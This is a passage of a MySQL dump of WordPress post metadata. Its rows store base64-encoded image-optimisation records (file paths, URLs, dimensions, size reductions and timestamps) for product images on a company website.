CJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbHVicmljYW50c19wYWdlLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMjc0LCJpZCI6NDZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9sdWJyaWNhbnRzX3BhZ2UtNDAweDMwMS5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9sdWJyaWNhbnRzX3BhZ2UtNDAweDMwMS5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjMwMSIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9sdWJyaWNhbnRzX3BhZ2UtNDAweDMwMS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEyNzYsImlkIjo0Nn1d'); 
INSERT INTO `wp_postmeta` VALUES (30413, 44, 'wpfc_optimisation_reduction', '1335'); 
INSERT INTO `wp_postmeta` VALUES (30414, 44, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbG9nby0yLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbG9nby0yLmpwZyIsIndpZHRoIjoxNjcsImhlaWdodCI6OTEsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9sb2dvLTIuanBnIiwicmVkdWN0aW9uIjoxMzM1LCJ0aW1lIjoxNDgzNTkxMjgzLCJpZCI6IjQ0In1d'); 
INSERT INTO `wp_postmeta` VALUES (30415, 43, 'wpfc_optimisation_reduction', '58821'); 
INSERT INTO `wp_postmeta` VALUES (30416, 43, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbGVuc2VzLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbGVuc2VzLmpwZyIsIndpZHRoIjozMDAsImhlaWdodCI6MjI4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbGVuc2VzLmpwZyIsInJlZHVjdGlvbiI6NTg4MTQsInRpbWUiOjE0ODM1OTEyODgsImlkIjoiNDMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2xlbnNlcy0yNTB4MjI4LmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjI4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2xlbnNlcy0yNTB4MjI4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2xlbnNlcy0yNTB4MjI4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTI5MCwiaWQiOjQzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2xlbnNlcy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2xlbnNlcy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2xlbnNlcy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTI5MywiaWQiOjQzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2xlbnNlcy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2xlbnNlcy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2xlbnNlcy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTI5NSwiaWQiOjQzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbGVuc2VzLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbGVuc2VzLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbGVuc2VzLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMjk3LCJpZCI6NDN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9sZW5zZXMtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9sZW5zZXMtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9sZW5zZXMtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEyOTksImlkIjo0M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2xlbnNlcy0yNDd4MjI4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2xlbnNlcy0yNDd4MjI4LmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMjI4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2xlbnNlcy0yNDd4MjI4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTMwMSwiaWQiOjQzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbGVuc2VzLTMwMHgyMjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbGVuc2VzLTMwMHgyMjguanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIyMjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvbGVuc2VzLTMwMHgyMjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMzAzLCJpZCI6NDN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30417, 39, 'wpfc_optimisation_reduction', '68407'); 
INSERT INTO `wp_postmeta` VALUES (30418, 39, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvamFyLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvamFyLmpwZyIsIndpZHRoIjo1OTAsImhlaWdodCI6MjUwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvamFyLmpwZyIsInJlZHVjdGlvbiI6NjgzOTcsInRpbWUiOjE0ODM1OTEzMTAsImlkIjoiMzkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2phci0zNDB4MjUwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2phci0zNDB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2phci0zNDB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTMxMywiaWQiOjM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2phci0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2phci0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2phci0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTMxNSwiaWQiOjM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2phci0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2phci0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2phci0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTMxNywiaWQiOjM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2phci0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2phci0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2phci0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTMxOSwiaWQiOjM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2phci01MTB4MjUwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2phci01MTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2phci01MTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTMyMSwiaWQiOjM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvamFyLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvamFyLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvamFyLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMzIzLCJpZCI6Mzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9qYXItMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9qYXItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9qYXItMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEzMjUsImlkIjozOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2phci0yNDd4MjUwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2phci0yNDd4MjUwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMjUwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2phci0yNDd4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTMyNywiaWQiOjM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvamFyLTMwMHgyNTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvamFyLTMwMHgyNTAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIyNTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvamFyLTMwMHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMzMwLCJpZCI6Mzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9qYXItNDAweDI1MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9qYXItNDAweDI1MC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjI1MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9qYXItNDAweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEzMzIsImlkIjozOX1d'); 
INSERT INTO `wp_postmeta` VALUES (30419, 38, 'wpfc_optimisation_reduction', '1511'); 
INSERT INTO `wp_postmeta` VALUES (30420, 38, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjIuanBnIiwid2lkdGgiOjY0MCwiaGVpZ2h0Ijo0ODAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lYXIyLmpwZyIsInJlZHVjdGlvbiI6MTUwMCwidGltZSI6MTQ4MzU5MTMzOSwiaWQiOiIzOCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjItMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lYXIyLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMzQxLCJpZCI6Mzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lYXIyLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMzQzLCJpZCI6Mzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lYXIyLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMzQ1LCJpZCI6Mzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lYXIyLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMzQ3LCJpZCI6Mzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMi01MTB4NDgwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NDgwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjItNTEweDQ4MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lYXIyLTUxMHg0ODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMzUwLCJpZCI6Mzh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9lYXIyLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMi0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2VhcjItMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEzNTIsImlkIjozOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjItMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9lYXIyLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvb